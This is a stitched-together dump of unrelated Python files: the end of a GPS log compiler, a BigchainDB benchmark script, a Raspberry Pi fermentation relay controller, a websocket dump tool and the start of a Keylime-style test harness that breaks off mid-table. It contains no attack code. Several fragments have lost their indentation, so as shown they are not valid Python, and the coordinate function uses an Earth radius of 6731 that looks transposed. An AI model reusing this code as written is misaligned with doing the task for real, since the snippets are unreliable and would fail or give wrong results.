#time.sleep(1)
#self.receiveSocket.sendto('1 3 1 1', (MCAST_GRP, MCAST_PORT))
def xyzToLatLong(self, x, y, z):
x = float(x)
y = float(y)
z = float(z)
r = 6731
long_0 = 0.0;
#________________________________________________
lon = long_0 + (x/r)
lat = (2 * math.atan(math.exp(y/r))) - (math.pi / 2.0)
lat *= (180.0/math.pi)
lon *= (180.0/math.pi)
# print("X", x)
# print("Y", y)
# print("Z", z)
# print("lat:", lat)
# print("long", lon)
# print("LC: Lat, Long:", lat, lon)
#________________________________________________
# r = math.sqrt(math.pow(x, 2) + math.pow(y, 2) + math.pow(z,2))
# lat = math.asin(z/r) * (180.0 / math.pi)
# lon = math.atan2(y, x) * (180.0 / math.pi)
# print("XYZ:", x, y, z)
# print("Lat/Long", lat, lon)
# return Location(lat, lon, 1.0)
#________________________________________________
# r = math.sqrt(math.pow(x, 2) + math.pow(y, 2) + math.pow(x,2))
# lat = math.asin(z/r) * (180/math.pi)
# lon = 0.0
# if (x > 0):
# lon = math.atan(y/x) * (180/math.pi)
# elif (y > 0):
# lon = math.atan(y/x) * (180/math.pi) + 180
# else:
# lon = math.atan(y/x) * (180/math.pi) - 180
return Location(lat, lon, 1.0)
def updateTracker(self, nodeNumber):
if nodeNumber in self.messageTracker:
self.messageTracker[nodeNumber] +=1;
else:
self.messageTracker[nodeNumber] = 1;
def outputNodeData(self):
while True:
for node in sorted(self.nodes):
logLine = str(self.currTimeInterval) + '.0 nem:' + str(node) + ' location gps ' + str(self.nodes[node].getX()) + ',' + str(self.nodes[node].getY())+ ',' +str(self.nodes[node].getZ()) + '\n'
self.logFile.write(logLine)
self.currTimeInterval += 1
time.sleep(1)
if __name__ == '__main__':
    # Listen on the swarm's broadcast port and start compiling the EEL log.
    log_compiler = LogCompiler(6666)
    log_compiler.start()
|
bench.py | import sys
from bigchaindb_driver import BigchainDB
from bigchaindb_driver.crypto import generate_keypair
import queue, threading, time

# CLI: load_file_path run_file_path comma-separated-endpoints thread-count
if len(sys.argv) != 5:
    print('Usage: python3 bench.py load_file_path run_file_path endpoints nthread')
    sys.exit(1)
# One fixed signer (alice) for every CREATE transaction in the benchmark.
alice, bob = generate_keypair(), generate_keypair()
metadata = {alice.public_key: bob.public_key}
loadFile, runFile, urls, threadNum = sys.argv[1], sys.argv[2], sys.argv[3].split(','), int(sys.argv[4])
# One driver instance per endpoint; workers round-robin over them.
bdbs = []
for url in urls:
    bdb = BigchainDB(url)
    bdbs.append(bdb)
def readFile(filepath, outQueue):
    """Read a YCSB-style workload file and enqueue every INSERT/READ/UPDATE
    line (newline included) onto outQueue; all other lines are skipped.

    :param filepath: path of the workload file (UTF-8 text).
    :param outQueue: queue.Queue receiving the raw operation lines.
    """
    with open(filepath, 'r', encoding='UTF-8') as f:
        # Iterating the file directly replaces the manual readline loop;
        # startswith accepts a tuple, so one call filters all three verbs.
        for line in f:
            if line.startswith(('INSERT', 'READ', 'UPDATE')):
                outQueue.put(line)
def sendTxn(lineQueue, latQueue, driver):
    """Worker: drain operations from lineQueue and execute them via driver.

    INSERT/UPDATE lines become asynchronously-sent CREATE transactions signed
    by the module-level `alice` keypair; every other line is treated as a
    READ (asset search on the key field).

    :param lineQueue: queue.Queue of raw workload lines ("VERB table key value").
    :param latQueue: queue.Queue collecting per-op latencies in seconds, or
        None (load phase) to skip latency recording.
    :param driver: BigchainDB driver instance to issue requests on.
    """
    while not lineQueue.empty():
        start = time.time()
        try:
            # empty()/get() is not atomic across workers: another thread may
            # drain the queue between the check and the get, so treat a
            # timeout as "queue exhausted" instead of crashing the worker.
            line = lineQueue.get(timeout=1)
        except queue.Empty:
            return
        args = line.split(' ', 3)
        if "INSERT" in line or "UPDATE" in line:
            data = {
                'data': {
                    args[2]: {
                        args[2]: args[3],
                    },
                },
            }
            prepared_creation_tx = driver.transactions.prepare(
                operation='CREATE',
                signers=alice.public_key,
                asset=data,
                metadata=metadata,
            )
            fulfilled_creation_tx = driver.transactions.fulfill(
                prepared_creation_tx, private_keys=alice.private_key)
            # Fire-and-forget; the benchmark does not await commit.
            driver.transactions.send_async(fulfilled_creation_tx)
        else:
            driver.assets.get(search=args[2])
        end = time.time()
        if latQueue is not None:
            latQueue.put(end - start)
print("Start loading init data...")
# Phase 1 (load): read the whole load file into a queue up front, then drain
# it with a fixed pool of 32 sender threads, round-robining the endpoints.
loadQueue = queue.Queue(maxsize=100000)
readFile(loadFile, loadQueue)
#tLoadRead = threading.Thread(target=readFile, args=(loadFile, loadQueue,))
#tLoadRead.start()
#time.sleep(5)
loadThreadList = []
for i in range(32):
    t = threading.Thread(target=sendTxn, args=(loadQueue, None, bdbs[i%len(bdbs)],))
    loadThreadList.append(t)
    t.start()
#tLoadRead.join()
for t in loadThreadList:
    t.join()
print("Start running experiments...")
# Phase 2 (run): same pattern, but with threadNum workers and a latency queue.
runQueue = queue.Queue(maxsize=100000)
latencyQueue = queue.Queue(maxsize=100000)
#tRunRead = threading.Thread(target=readFile, args=(runFile, runQueue,))
#tRunRead.start()
#time.sleep(5)
readFile(runFile, runQueue)
time.sleep(5)
runThreadList = []
for i in range(threadNum):
    t = threading.Thread(target=sendTxn, args=(runQueue, latencyQueue, bdbs[i%len(bdbs)],))
    runThreadList.append(t)
start = time.time()
for t in runThreadList:
    t.start()
    # staggered start: one new worker per second -- TODO confirm the sleep
    # belongs inside the loop (indentation was lost in this copy)
    time.sleep(1)
for t in runThreadList:
    t.join()
end = time.time()
#allLatency = []
#def getLatency(latQueue):
# Aggregate mean latency over every recorded operation.
lat = 0
num = 0
while latencyQueue.empty() == False:
    ts = latencyQueue.get()
    lat = lat + ts
    num = num + 1
#    allLatency.append(ts)
#tLatency = threading.Thread(target=getLatency, args=(latencyQueue,))
#tLatency.start()
# print("Before join...")
# tRunRead.join()
#for t in runThreadList:
#    t.join()
# NOTE(review): throughput assumes the run file holds exactly 100000 ops --
# confirm, or divide by the actual operation count instead.
print('Throughput: {} txn/s'.format(100000/(end-start)))
print('Latency: {} ms'.format(lat/num*1000))
|
pitmRelay.py | #!/usr/bin/python
# piTempBuzzer
import os
import hashlib
import struct
import socket
import syslog
import sys
import threading
import time
from pitmCfg import pitmCfg
from pitmLCDisplay import *
from pitmMcastOperations import pitmMcast
from pitmLogHandler import pitmLogHandler
from gpiotools import gpiotools
class pitmRelay:
    """
    This class deals with the logic for turning relays on and off.
    An eight-relay board is connected to a Raspberry PI for the following functions
        1) Fridge Heater
        2) Fridge
        3) Fridge Reciculating Fan
        4) Extract Fan (for boil-time)
    The other pins relays are used for
        Enable power to Zone A (pitmSsrRelay)
        Enable power to Zone B (pitmSsrRelay)
        Toggle Zone A use  ** ONE OF THESE RELAYS IS BROKEN **
        Toggle Zone B use
    """

    def __init__(self, rpi=True):
        """Initialise controller state; when rpi is True also attach the
        GPIO/LCD hardware and force every relay off."""
        self.cfg = pitmCfg()
        self.groot = pitmLogHandler()
        # time.time() when cooling/heating went active; -1 means inactive.
        self.fermCoolActiveFor = -1
        self.fermHeatActiveFor = -1
        # Seconds the compressor must rest before it may start again.
        self.fridgeCompressorDelay = 120
        self.fridgeCool = False
        self.fridgeHeat = False
        # Count how long we have been active for
        self.meterFermH = 0
        self.meterFermC = 0
        self._lastValidReading = {'ferm': -1}
        self.mcastMembership = False
        self.zoneTemp = -1
        self.zoneTarget = -1
        self.zoneTempTimestamp = -1
        self.zoneUpTarget = -1
        self.zoneDownTarget = -1
        self._mode = "UNKNOWN"
        self.cycle = 4
        self.recircfanCount = 0
        # Shadow copies of the GPIO pin states (None until first written).
        self._gpioFermCool = None
        self._gpioFermHeat = None
        self._gpiorecircfan = None
        self._gpioExtractor = None
        if rpi:
            self.gpio = gpiotools()
            self.lcdDisplay = pitmLCDisplay()
            self.gpio.output("fermCool", 0)
            self.gpio.output('recircfan', 0)
            self.gpio.output('extractor', 0)
            self.gpio.output("fermHeat", 0)

    def __del__(self):
        # Fail safe: everything off when the controller object dies.
        self._mode = "shutdown"
        self.gpio.output('fermHeat', 0)
        self.gpio.output('fermCool', 0)
        self.gpio.output('recircfan', 0)
        self.gpio.output('extractor', 0)

    def uncontrol(self):
        """Release control: mark shutdown mode and switch all relays off."""
        self.groot.log("Uncontrol Called")
        self._mode = "shutdown"
        self.gpio.output('fermHeat', 0)
        self.gpio.output('fermCool', 0)
        self.gpio.output('recircfan', 0)
        self.gpio.output('extractor', 0)

    def submission(self):
        """Follow the controller's mode broadcasts (or a local override file)."""
        self.groot.log("Submitting to control of Controller")
        if os.path.exists('ipc/overrideModeFerm'):
            self._mode = 'ferm'
            return
        mcast_handler = pitmMcast()
        mcast_handler.open_socket(self.callback_set_mode, self.cfg.mcastPort)

    def callback_set_mode(self, cm):
        """Adopt the mode published by the controller, when present."""
        # was cm.has_key('_mode'): Python-2-only; `in` works on both 2 and 3
        if '_mode' in cm:
            self._mode = cm['_mode']

    def zoneTempThread(self):
        """Listen on multicast for temperature updates."""
        self.groot.log("Listening for temperature'")
        mcast_handler = pitmMcast()
        mcast_handler.open_socket(self.callback_zone_temp_thread, self.cfg.mcastTemperaturePort)

    def callback_zone_temp_thread(self, cm):
        """
        This call back decodes the temperature and sets it on ourself.
        It also logs
        """
        if not self._mode == "idle":
            if self.cfg.fermProbe in cm['currentResult']:  # was .has_key(): Python-2-only
                if cm['currentResult'][self.cfg.fermProbe]['valid']:
                    self.zoneTemp = float(cm['currentResult'][self.cfg.fermProbe]['temperature'])
                    self.zoneTempTimestamp = time.time()
                    if self.fridgeCompressorDelay > 0:
                        delay = True
                    else:
                        delay = False
                    self.groot.log("Temp: %s Target: %s(>%s <%s) fridgeHeat: %s/%s fridgeCool: %s/%s (delay %s) " % (self.zoneTemp, self.zoneTarget, self.zoneUpTarget, self.zoneDownTarget,
                                                                                                                    self.fridgeHeat, self._gpioFermHeat, self.fridgeCool, self._gpioFermCool, delay), importance=0)
                else:
                    self.lcdDisplay.sendMessage("Temp Result Error", 2)
            if "tempTargetFerm" in cm:  # was .has_key(): Python-2-only
                # zoneDownTarget when we need to start cooling
                # zoneUpTarget when we need to start heating
                # zoneTarget when we need to stop cooling/heating
                (self_zoneUpTarget, self_zoneDownTarget, self_zoneTarget) = cm['tempTargetFerm']
                if self_zoneUpTarget < 5 or self_zoneDownTarget < 5 or self_zoneTarget < 5:
                    self.groot.log("Temp Target is invalid %s,%s,%s" % (cm['tempTargetFerm'][0], cm['tempTargetFerm'][1], cm['tempTargetFerm'][2]), importance=2)
                else:
                    (self.zoneUpTarget, self.zoneDownTarget, self.zoneTarget) = cm['tempTargetFerm']

    def _zone_idle_shutdown(self):
        """Idle/shutdown: relays off and a fresh compressor rest period."""
        self.fridgeCompressorDelay = 301
        self.gpio.output("fermCool", 0)
        self.gpio.output('recircfan', 0)
        self.gpio.output('extractor', 0)
        self.gpio.output("fermHeat", 0)
        self._gpioFermCool = False
        self._gpioFermHeat = False
        self._gpiorecircfan = False
        self._gpioExtractor = False
        self.fridgeHeat = False
        self.fridgeCool = False

    def _zone_boil(self):
        """Boil mode: heating/cooling off, extractor fan on."""
        self.gpio.output('fermHeat', 0)
        self.gpio.output('fermCool', 0)
        self.gpio.output('extractor', 1)
        self._gpioFermCool = False
        self._gpioFermHeat = False
        self._gpioExtractor = True

    def zoneThread(self):
        """
        The main action loop that deals with switching relays
        """
        while True:
            self._do_zone_thread()
            time.sleep(1)

    def _disable_ferm_control(self):
        self._turn_cooling_off()
        self._turn_heating_off()

    def _safety_check_for_missing_readings(self):
        """Return False (and switch everything off) when no valid temperature
        reading arrived within the last 100 seconds."""
        if self._lastValidReading['ferm'] + 100 < time.time():
            self.groot.log("Critical: no valid readings for 100 seconds")
            self.gpio.output('fermHeat', 0)
            self._gpioFermCool = False
            self._gpioFermHeat = False
            self.lcdDisplay.sendMessage("CRITICAL Temp Result Error", 2)
            self.gpio.output('fermCool', 0)
            self.gpio.output('recircfan', 0)
            self.fridgeCompressorDelay = 300
            return False
        return True

    def _safety_check_for_unrealistic_readings(self):
        """Return False when the reading is outside the plausible 4..75C band."""
        if self.zoneTemp > 75 or self.zoneTemp < 4:
            self.groot.log("Unrealistic Temperature Value %s:%s %s\n" % (self.zoneTemp, self.zoneTempTimestamp, self._mode))
            return False
        return True

    def _safety_check_will_starting_the_fridge_damage_the_compressor(self):
        """True while the compressor rest delay is still counting down."""
        if self.fridgeCompressorDelay > 0:
            self.lcdDisplay.sendMessage(" %s - Fridge Delay" % (self.fridgeCompressorDelay), 2)
            self._turn_cooling_off()
            return True
        return False

    def _safety_check_has_fridge_been_running_too_long_if_so_turn_off(self):
        """True when cooling ran for over 30 minutes; rests the fridge."""
        if (time.time() - self.fermCoolActiveFor > 1800) and self.fermCoolActiveFor > 0:
            self.groot.log("Cooling has been active for %s - resting fridge" % (time.time() - self.fermCoolActiveFor))
            self._turn_cooling_off()
            # we have a longer sleep if getting turn off because of long running
            self.fridgeCompressorDelay = 601
            return True
        return False

    def _is_heating_required(self):
        """Heating is wanted when below the up-target and not already heating."""
        if os.path.exists("ipc/disable-ferm-heat"):
            return False
        if self.zoneTemp < self.zoneUpTarget and not self.fridgeHeat:
            self.groot.log("Heating Requied %s < %s" % (self.zoneTemp, self.zoneUpTarget))
            return True
        return False

    def _turn_cooling_off(self):
        self.gpio.output('fermCool', 0)
        self._gpioFermCool = False
        self.fridgeCool = False
        if self.fridgeCompressorDelay < 1:
            self.fridgeCompressorDelay = 300
        if self.fermCoolActiveFor > 0:
            self.meterFermC = self.meterFermC + (time.time() - self.fermCoolActiveFor)
            self.groot.log("Cooling total active time %s" % (self.meterFermC))
        self.fermCoolActiveFor = -1

    def _turn_cooling_on(self):
        """
        Important safety checks for compressor must be called before this
        """
        self.lcdDisplay.sendMessage(" Cooling", 2)
        self._gpioFermCool = True
        self.gpio.output('fermCool', 1)
        self.fridgeCool = True
        if self.fermCoolActiveFor == -1:
            self.fermCoolActiveFor = time.time()

    def _turn_heating_on(self):
        self.fridgeHeat = True
        self._gpioFermHeat = True
        self.gpio.output('fermHeat', 1)
        self.lcdDisplay.sendMessage(" Heating", 2)
        if self.fermHeatActiveFor == -1:
            self.fermHeatActiveFor = time.time()

    def _turn_heating_off(self):
        self.fridgeHeat = False
        self.gpio.output('fermHeat', 0)
        self._gpioFermHeat = False
        # (merged the two identical `> 0` guards from the original)
        if self.fermHeatActiveFor > 0:
            self.meterFermH = self.meterFermH + (time.time() - self.fermHeatActiveFor)
            self.groot.log("Heating total active time %s" % (self.meterFermH))
        self.fermHeatActiveFor = -1

    def _turn_recirc_fan_on(self):
        self.gpio.output('recircfan', 1)

    def _turn_recirc_fan_off(self):
        self.gpio.output('recircfan', 0)

    def _is_cooling_required(self):
        """Cooling is wanted when above the down-target."""
        if os.path.exists("ipc/disable-fermcool"):
            return False
        if self.zoneTemp > self.zoneDownTarget:
            self.groot.log("Cooling Required %s > %s" % (self.zoneTemp, self.zoneDownTarget))
            return True
        return False

    def _zone_ferm(self):
        """Fermentation mode: one control tick (called once a second)."""
        self.fridgeCompressorDelay = self.fridgeCompressorDelay - 1
        safety_check_ok = self._safety_check_for_missing_readings()
        if not safety_check_ok:
            self.groot.log("Unrealistic readings!")
            # Cannot continue because we have no valid reading
            return
        unrealistic_values_check_ok = self._safety_check_for_unrealistic_readings()
        if not unrealistic_values_check_ok:
            return
        if not self.fridgeHeat and not self.fridgeCool:
            self.lcdDisplay.sendMessage("", 2)
        if os.path.exists("ipc/no-ferm-control"):
            self._disable_ferm_control()
        if self._gpiorecircfan == None:
            self.gpio.output('recircfan', 0)
            self._gpiorecircfan = False
        if self._gpioExtractor == None:
            self.gpio.output('extractor', 0)
            self._gpioExtractor = False
        self._lastValidReading['ferm'] = time.time()
        heating_required = self._is_heating_required()
        cooling_required = self._is_cooling_required()
        if heating_required:
            self._turn_cooling_off()
            self._turn_heating_on()
            self._turn_recirc_fan_on()
        elif cooling_required:
            self._turn_heating_off()
            if self._safety_check_will_starting_the_fridge_damage_the_compressor():
                self._turn_recirc_fan_off()
            elif self._safety_check_has_fridge_been_running_too_long_if_so_turn_off():
                self._turn_recirc_fan_off()
            else:
                self._turn_recirc_fan_on()
                self._turn_cooling_on()
        # Stop 0.15C short of the target to limit overshoot.
        if self.fridgeHeat and self.zoneTemp > self.zoneTarget - 0.15:
            self.groot.log("Target Reached stopping heat active for %s" % (time.time() - self.fermHeatActiveFor))
            self._turn_cooling_off()
            self._turn_heating_off()
            self._turn_recirc_fan_off()
        if self.fridgeCool and self.zoneTemp < self.zoneTarget + 0.15:
            self.groot.log("Target Reached stopping cooling active for %s" % (time.time() - self.fermCoolActiveFor))
            self._turn_cooling_off()
            self._turn_heating_off()
            self._turn_recirc_fan_off()

    def _do_zone_thread(self):
        """Dispatch one tick to the handler for the current mode."""
        if self._mode == "idle" or self._mode == "shutdown":
            self._zone_idle_shutdown()
        elif self._mode.count("boil"):
            self._zone_boil()
        elif self._mode == "ferm":
            if self._lastValidReading['ferm'] == -1:
                self._lastValidReading['ferm'] = time.time()
            self._zone_ferm()

    def broadcastResult(self):
        """Publish the relay pin states over multicast once a second."""
        mcast_handler = pitmMcast()
        while 1:
            controlMessage = {}
            controlMessage['gpiorecircfan'] = self._gpiorecircfan
            controlMessage['gpioExtractor'] = self._gpioExtractor
            controlMessage['gpioFermCool'] = self._gpioFermCool
            controlMessage['gpioFermHeat'] = self._gpioFermHeat
            mcast_handler.send_mcast_message(controlMessage, self.cfg.mcastRelayPort, 'relay')
            time.sleep(1)
if __name__ == '__main__':
    try:
        controller = pitmRelay()
        # Fan out the daemon worker threads: result broadcaster, controller
        # submission, temperature listener, and the relay action loop.  All
        # are daemonized so Ctrl+C in the main loop tears everything down.
        for worker in (controller.broadcastResult,
                       controller.submission,
                       controller.zoneTempThread,
                       controller.zoneThread):
            worker_thread = threading.Thread(target=worker)
            worker_thread.daemon = True
            worker_thread.start()
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        controller.uncontrol()
|
wsdump.py | #!/Users/ethan/Documents/Proxabot/venv/bin/python3
"""
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
from urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
    """Return the lower-cased encoding of stdin, defaulting to utf-8."""
    detected = getattr(sys.stdin, "encoding", "")
    return detected.lower() if detected else "utf-8"
# Frame opcodes that carry application data (text and binary payloads).
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
# Cached stdin encoding, used to re-encode interactive input as UTF-8.
ENCODING = get_encoding()
class VAction(argparse.Action):
    """argparse action for -v: accepts an explicit integer ('-v 2') or
    counts the 'v' characters ('-vv' -> 2... plus one)."""

    def __call__(self, parser, args, values, option_string=None):
        raw = "1" if values is None else values
        try:
            level = int(raw)
        except ValueError:
            level = raw.count("v") + 1
        setattr(args, self.dest, level)
def parse_args():
    """Build the command-line interface and parse sys.argv for the dump tool."""
    cli = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
    cli.add_argument(
        "url", metavar="ws_url",
        help="websocket url. ex. ws://echo.websocket.org/")
    cli.add_argument(
        "-p", "--proxy",
        help="proxy url. ex. http://127.0.0.1:8080")
    cli.add_argument(
        "-v", "--verbose", default=0, nargs='?', action=VAction, dest="verbose",
        help="set verbose mode. If set to 1, show opcode. "
             "If set to 2, enable to trace websocket module")
    cli.add_argument(
        "-n", "--nocert", action='store_true',
        help="Ignore invalid SSL cert")
    cli.add_argument(
        "-r", "--raw", action="store_true",
        help="raw output")
    cli.add_argument(
        "-s", "--subprotocols", nargs='*',
        help="Set subprotocols")
    cli.add_argument(
        "-o", "--origin",
        help="Set origin")
    cli.add_argument(
        "--eof-wait", default=0, type=int,
        help="wait time(second) after 'EOF' received.")
    cli.add_argument(
        "-t", "--text",
        help="Send initial text")
    cli.add_argument(
        "--timings", action="store_true",
        help="Print timings in seconds")
    cli.add_argument(
        "--headers",
        help="Set custom headers. Use ',' as separator")
    return cli.parse_args()
class RawInput:
    """Prompt helper that normalizes console input to UTF-8 bytes."""

    def raw_input(self, prompt):
        entered = input(prompt)
        if isinstance(entered, str):
            return entered.encode("utf-8")
        # Non-str input: transcode from the detected stdin encoding if needed.
        if ENCODING and ENCODING != "utf-8":
            return entered.decode(ENCODING).encode("utf-8")
        return entered
class InteractiveConsole(RawInput, code.InteractiveConsole):
    """Console that pretty-prints received frames above a persistent prompt."""

    def write(self, data):
        out = sys.stdout
        # Clear the current line, print the frame in blue, restore the prompt.
        out.write("\033[2K\033[E")
        out.write("\033[34m< " + data + "\033[39m")
        out.write("\n> ")
        out.flush()

    def read(self):
        return self.raw_input("> ")
class NonInteractive(RawInput):
    """Plain line-oriented console for --raw mode."""

    def write(self, data):
        sys.stdout.write(data + "\n")
        sys.stdout.flush()

    def read(self):
        return self.raw_input("")
def main():
    """Connect to the websocket given on the command line, dump incoming
    frames on a background thread, and forward console input to the peer."""
    start_time = time.time()
    args = parse_args()
    if args.verbose > 1:
        websocket.enableTrace(True)
    options = {}
    if args.proxy:
        p = urlparse(args.proxy)
        options["http_proxy_host"] = p.hostname
        options["http_proxy_port"] = p.port
    if args.origin:
        options["origin"] = args.origin
    if args.subprotocols:
        options["subprotocols"] = args.subprotocols
    opts = {}
    if args.nocert:
        # --nocert: skip certificate validation entirely
        opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
    if args.headers:
        options['header'] = list(map(str.strip, args.headers.split(',')))
    ws = websocket.create_connection(args.url, sslopt=opts, **options)
    if args.raw:
        console = NonInteractive()
    else:
        console = InteractiveConsole()
        print("Press Ctrl+C to quit")

    def recv():
        # Read one frame; answer pings and close handshakes transparently.
        try:
            frame = ws.recv_frame()
        except websocket.WebSocketException:
            return websocket.ABNF.OPCODE_CLOSE, None
        if not frame:
            raise websocket.WebSocketException("Not a valid frame %s" % frame)
        elif frame.opcode in OPCODE_DATA:
            return frame.opcode, frame.data
        elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
            ws.send_close()
            return frame.opcode, None
        elif frame.opcode == websocket.ABNF.OPCODE_PING:
            ws.pong(frame.data)
            return frame.opcode, frame.data
        return frame.opcode, frame.data

    def recv_ws():
        # Background loop: decode each frame (including gzip/zlib payloads)
        # and hand it to the console until the peer closes.
        while True:
            opcode, data = recv()
            msg = None
            if opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
                data = str(data, "utf-8")
            if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213':  # gzip magick
                try:
                    data = "[gzip] " + str(gzip.decompress(data), "utf-8")
                except:
                    pass
            elif isinstance(data, bytes):
                try:
                    data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
                except:
                    pass
            if isinstance(data, bytes):
                data = repr(data)
            if args.verbose:
                msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
            else:
                msg = data
            if msg is not None:
                if args.timings:
                    console.write(str(time.time() - start_time) + ": " + msg)
                else:
                    console.write(msg)
            if opcode == websocket.ABNF.OPCODE_CLOSE:
                break

    thread = threading.Thread(target=recv_ws)
    thread.daemon = True
    thread.start()
    if args.text:
        ws.send(args.text)
    # Foreground loop: ship console input to the server until Ctrl+C or EOF.
    while True:
        try:
            message = console.read()
            ws.send(message)
        except KeyboardInterrupt:
            return
        except EOFError:
            # --eof-wait lets pending server frames arrive before exiting
            time.sleep(args.eof_wait)
            return
if __name__ == "__main__":
    try:
        main()
    except Exception as err:
        # Best-effort CLI: surface the error without a full traceback.
        print(err)
|
oldtest.py | '''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
'''
import unittest
import threading
import tornado_requests
import os
import json
import base64
import configparser
import common
import crypto
import tempfile
import signal
import subprocess
import queue
import uuid
import time
import tenant
import _io
from distutils.dir_util import copy_tree
import shutil
# --- shared test-harness state --------------------------------------------
sentinel = None
cv_process = None        # cloud-verifier subprocess handle
cn_process = None        # single cloud-agent subprocess handle
cn_process_list = []     # cloud-agent handles when many agents are launched
# NOTE(review): this rebinds the module name 'queue' to a Queue instance,
# making queue.Queue unreachable from here on -- confirm nothing below needs it.
queue = queue.Queue()
num_threads = 5
# Endpoints and credentials are pulled from the shared configuration file.
config = configparser.RawConfigParser()
config.read(common.CONFIG_FILE)
cloudverifier_port = config.get('general', 'cloudverifier_port')
cloudagent_port = config.get('general', 'cloudagent_port')
registrar_port = config.get('general', 'registrar_port')
cloudagent_ip = config.get('tenant', 'cloudagent_ip')
cloudverifier_ip = config.get('tenant', 'cloudverifier_ip')
registrar_ip = config.get('tenant', 'cloudverifier_ip')  # NOTE(review): reads cloudverifier_ip -- possible copy/paste; confirm
tpm_policy = json.loads(config.get('tenant', 'tpm_policy'))
my_cert = config.get('tenant', 'my_cert')
ca_cert = config.get('tenant', 'ca_cert')
private_key = config.get('tenant', 'private_key')
test_num_cloudagents = config.getint('general', 'test_num_cloudagents')
test_duration = config.getint('general', 'test_duration')
# cv_persistence_filename = config.get('cloud_verifier', 'persistence_filename')
# en_persistence_filename = config.get('registrar', 'persistence_filename')
cv_persistence_filename = None
en_persistence_filename = None
# K/U/V bootstrap keys, populated by readKUV()
K = None
U = None
V = None
def readKUV():
    """Load the K, U and V bootstrap keys into the module globals.

    Reads content_keys.txt from the working directory: one base64-encoded
    key per line, in K, U, V order.  Raises FileNotFoundError when the
    file is absent and binascii.Error on malformed base64.
    """
    global K, U, V
    # `with` guarantees the handle is closed even if decoding raises.
    with open('content_keys.txt', 'r') as f:
        K = base64.b64decode(f.readline())
        U = base64.b64decode(f.readline())
        V = base64.b64decode(f.readline())
def text_callback(request, context):
    """Mock-HTTP callback: force a 402 status and return an empty JSON body."""
    context.status_code = 402
    return '{}'
class Test(unittest.TestCase):
cloudverifier_process = None
@classmethod
def setUpClass(cls):
cls.test_table = {
"test_cloudagent_tenant_get_nonce": {
"prerun_function": {"name": "launch_cloudagent", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudagent_tenant_get_nonce",
"http_request_verb": "GET",
"http_request_ip": cloudagent_ip,
"http_request_port": cloudagent_port,
"http_request_query": {"nonce": "ThisIsThePasswordABC"},
"http_request_path": "/v1/quotes/tenant",
"http_result_status_expected": 200,
"check_function": {"name": "check_test_cloudagent_tenant_get_nonce"},
}
],
"postrun_function": {"name": "kill_cloudagent", "argument": None},
},
"test_cloudagent_tenant_get_quote": {
"prerun_function": {"name": "launch_cloudagent", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudagent_tenant_get_quote",
"http_request_verb": "POST",
"http_request_ip": cloudagent_ip,
"http_request_port": cloudagent_port,
"http_request_path": "/v1/quotes/tenant",
"http_request_body": '{"encrypt_check": "K+oD4GfBMAdOFy94ZxTU2hB77tySSB75VVz2Zo4jN02txhNK2KiO5JhE1SRIUVASMZMW/VQUS9WgWdCUaJ+LOTWSuQ13alG4P4cLoamBr9c=","encrypted_key":"rBWIxK4i6zTl/M69Yyh2hmX+itDR9QCx4CIqmuRrEN3JAIUc2M+balr8gPD9r3Bs0OxYRC8/kcxBNo9Bsm93WZKwlmbZt2uVxhfaAqXwdGVpMBnM3bQnAEj1LIFoZZyQ48PVIdrEO4WW73Z2X3fplEFgOC3YT3lzluYgrn8iBkMRm+o2pJMdhynh6xLguszLX7qDOccPIIJch14ftWlsy6Ya9a6LHr9+hIfs4p2ATVVSl1wtUbf/ouNJdqUPAiFc4oXsg+kHQzWWiipjsAm871cA4wlvUb+/D4mFz1p3PRAK9hcICGwKoanWh8jbeuYnoqkch2EoHeLqayrisfNogg=="}',
"http_result_status_expected": 200,
}
],
"postrun_function": {"name": "kill_cloudagent", "argument": None},
},
"test_cloudverifier_tenant_provide_v": {
# "prerun_function" : {"name":"launch_cloudverifier", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudverifier_tenant_provide_v",
# "pre_function" : {"name":"do_mock_for_test_cloudverifier_tenant_provide_v", "argument": None},
"http_request_verb": "POST",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
# "concurrent_instances" : 10,
# "concurrent_new_thread_function" : "new_thread",
# "test_iterations" : 100,
},
],
},
"test_concurrent_access": {
"prerun_function": {"name": "launch_cloudverifier", "argument": None},
"state_change_functions": [
{
"function_name": "test_concurrent_access",
"http_request_verb": "POST",
"http_request_ip": cloudverifier_ip,
"http_request_port": cloudverifier_port,
"http_request_path": "/v1/instances",
